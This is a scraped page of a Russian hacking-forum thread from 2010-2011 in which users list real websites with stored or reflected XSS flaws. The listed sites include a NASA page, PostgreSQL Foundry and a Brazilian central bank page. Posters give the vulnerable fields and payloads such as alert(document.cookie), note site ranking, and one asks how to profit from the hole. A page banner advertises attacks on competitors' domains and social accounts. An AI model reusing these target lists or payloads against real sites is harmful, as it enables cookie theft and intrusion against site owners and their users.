Активные Xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активные Xss

Страница 43 из 54

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#421

30.10.2010, 19:48

<Cyber-punk>

Участник форума

Регистрация: 01.10.2009

Сообщений: 105

С нами: 8742676

Репутация: 94

http://www.dosug.cz/servlet/ru/recover

Вводим:

Цитата:

Сообщение от None

">alert(/xss/)

http://www.cadebou.pp.ru/ru/gb.php

http://www.laspodmoga.ru/gb.php

При ответе уязвимы все поля, кроме каптчи:

Цитата:

Сообщение от None

">alert(/xss/)

#422

13.11.2010, 01:59

Jokerll

Новичок

Регистрация: 11.11.2010

Сообщений: 8

С нами: 8158646

Репутация: 0

http://www.a1tv.ru/msearch/?&o=

вводим

Код:

">alert(/Xss by Jokerll/)

Выходит -

http://www.a1tv.ru/msearch/?&o=">alert(/Xss by Jokerll/)

#423

13.11.2010, 03:20

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

С нами: 8603287

Репутация: 87

nasa в паб. http://buzzroom.nasa.gov/

там где написано "What's Happening?" меняем на:

">alert(document.cookie)

#424

14.11.2010, 20:00

warzi

Новичок

Регистрация: 13.11.2010

Сообщений: 10

С нами: 8155766

Репутация: 0

mylove.ru активка в поле "интересы" в анкете ( а также в остальных полях там же). Не фильтруется вообще ничего, любой хтмл код лезет

Код:

Активка вида alert(/1/)

т.е. не закрываем тег (иначе будет видно в панели наверху)

Также, возможно, аналогичным образом уязвимы сайты-клоны lovegeek.ru и sex-znakomstva.tv

#425

20.11.2010, 19:08

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

PostgreSQL Foundry

http://pgfoundry.org/account/register.php

уязвимы все поля регистрации

">alert()

тИЦ 170, PR-7

#426

08.12.2010, 01:31

niva622

Новичок

Регистрация: 05.11.2008

Сообщений: 11

С нами: 9218527

Репутация: 0

nnhost.ru

http://nnhost.ru/?p=5

все поля уязвимы

">alert()

#427

12.12.2010, 01:15

KREGI

Новичок

Регистрация: 09.02.2009

Сообщений: 23

С нами: 9079073

Репутация: -9

ТИЦ 500

http://www.indarnb.ru/add-preview/

Уязвимы все поля

">alert(document.cookie)

#428

13.12.2010, 18:17

MikePro

Новичок

Регистрация: 30.01.2010

Сообщений: 0

С нами: 8569062

Репутация: 0

20 000 хостов, ТиЦ 275

Код HTML:

http://www.web-ip.ru/index.php?action=reg&r=1

Втавляем

Код HTML:

">alert()

в поле E-mail.

как извлечь из этой дыры пользу не знаю Если есть идеи напишите плз

#429

16.12.2010, 23:52

ubi

Новичок

Регистрация: 25.12.2009

Сообщений: 18

С нами: 8620247

Репутация: 0

http://www.it-monster.ru/register/typecandidate/

Уязвимое поле ICQ UIN

">alert(/xss/)

#430

13.01.2011, 14:36

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

http://www.bcb.gov.br/?id=MINUTES&ano=%3Cscript%3Ealert('XSS')%3C/script%3E

Раздел сайта в DMOZ > Society > Government > Finance > Central_Banks

ТИЦ90 PR8

P.S Надеюсь модераторы оставят

Страница 43 из 54

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход